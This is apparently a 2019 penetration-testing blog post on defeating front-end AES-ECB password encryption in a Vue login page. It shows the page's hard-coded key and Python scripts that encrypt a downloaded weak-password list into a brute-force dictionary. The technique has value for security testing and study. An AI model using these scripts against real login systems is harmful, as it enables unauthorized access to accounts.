Notes on a simple process of locating front-end encryption logic before brute forcing a login

The process is fairly simple, so this is a lightweight post. It mainly follows the third method described in this article.

The front end is written in Vue; copy the front-end code out of the browser.

Find the handler function triggered by the login button.

Find the password variable inside the submit function.

A global search for that variable locates the encryption logic, and with it the key used for encryption.

The comment shows that it is AES encryption.

The variables in the code show that it is AES in ECB mode:

```javascript
const encrypt = (word, keyStr) => {
  // fallback key hard-coded in the front end
  keyStr = keyStr ? keyStr : 'abcdefgabcdefg12';
  let key = CryptoJS.enc.Utf8.parse(keyStr); //Latin1 w8m31+Yy/Nw6thPsMpO5fg==
  let srcs = CryptoJS.enc.Utf8.parse(word);
  // AES-ECB with PKCS#7 padding, no IV
  let encrypted = CryptoJS.AES.encrypt(srcs, key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7 });
  return encrypted.toString();
};
```

Grab a Python AES-ECB script from the internet:

```python
import base64

from Crypto.Cipher import AES


class AESUtil:

    BLOCK_SIZE_16 = AES.block_size  # 16 bytes for AES

    @staticmethod
    def encrypt(text, key):
        # AES-ECB with manual PKCS#7 padding; key and text must be bytes
        cipher = AES.new(key, AES.MODE_ECB)
        x = AESUtil.BLOCK_SIZE_16 - (len(text) % AESUtil.BLOCK_SIZE_16)
        text = text + bytes([x]) * x
        msg = cipher.encrypt(text)
        # URL-safe base64 with the trailing '=' padding stripped
        return base64.urlsafe_b64encode(msg).replace(b'=', b'').decode()

    @staticmethod
    def decrypt(en_str, key):
        cipher = AES.new(key, AES.MODE_ECB)
        # restore the base64 padding that encrypt() stripped
        en_str += '=' * (-len(en_str) % 4)
        decrypt_bytes = base64.urlsafe_b64decode(en_str)
        msg = cipher.decrypt(decrypt_bytes)
        padding_len = msg[-1]
        return msg[:-padding_len]


if __name__ == "__main__":
    key = b"G20PAA&9-EEFPQ5T"
    print(AESUtil.encrypt(b"123456", key))
```

Comparing the script's output with the value the page actually submits shows that the submitted value still carries the base64 padding.

Tweak the code slightly and use a weak-password wordlist from GitHub to generate the encrypted dictionary:

```python
import base64

import requests
from Crypto.Cipher import AES


class AESUtil:

    BLOCK_SIZE_16 = AES.block_size  # 16 bytes for AES

    @staticmethod
    def encrypt(text, key):
        # AES-ECB with manual PKCS#7 padding; key and text must be bytes
        cipher = AES.new(key, AES.MODE_ECB)
        x = AESUtil.BLOCK_SIZE_16 - (len(text) % AESUtil.BLOCK_SIZE_16)
        text = text + bytes([x]) * x
        msg = cipher.encrypt(text)
        # keep the '=' padding and use the standard alphabet ('+', '/'),
        # which is what CryptoJS's toString() submits
        return base64.b64encode(msg).decode()

    @staticmethod
    def decrypt(en_str, key):
        cipher = AES.new(key, AES.MODE_ECB)
        decrypt_bytes = base64.b64decode(en_str)
        msg = cipher.decrypt(decrypt_bytes)
        padding_len = msg[-1]
        return msg[:-padding_len]


if __name__ == "__main__":
    resp = requests.get(url="https://raw.githubusercontent.com/TheKingOfDuck/fuzzDicts/master/passwordDict/top1000.txt")
    passwd_list = resp.text.splitlines()
    key = b"G20PAA&9-EEFPQ5T"
    with open('./top1000en.txt', 'a+') as f:
        for i in passwd_list:
            f.write(AESUtil.encrypt(i.encode(), key) + '\n')
    print(AESUtil.encrypt(b"123456", key))
```
Author: 李三(cl0und)

Posted on 2019-11-08

Updated on 2020-07-11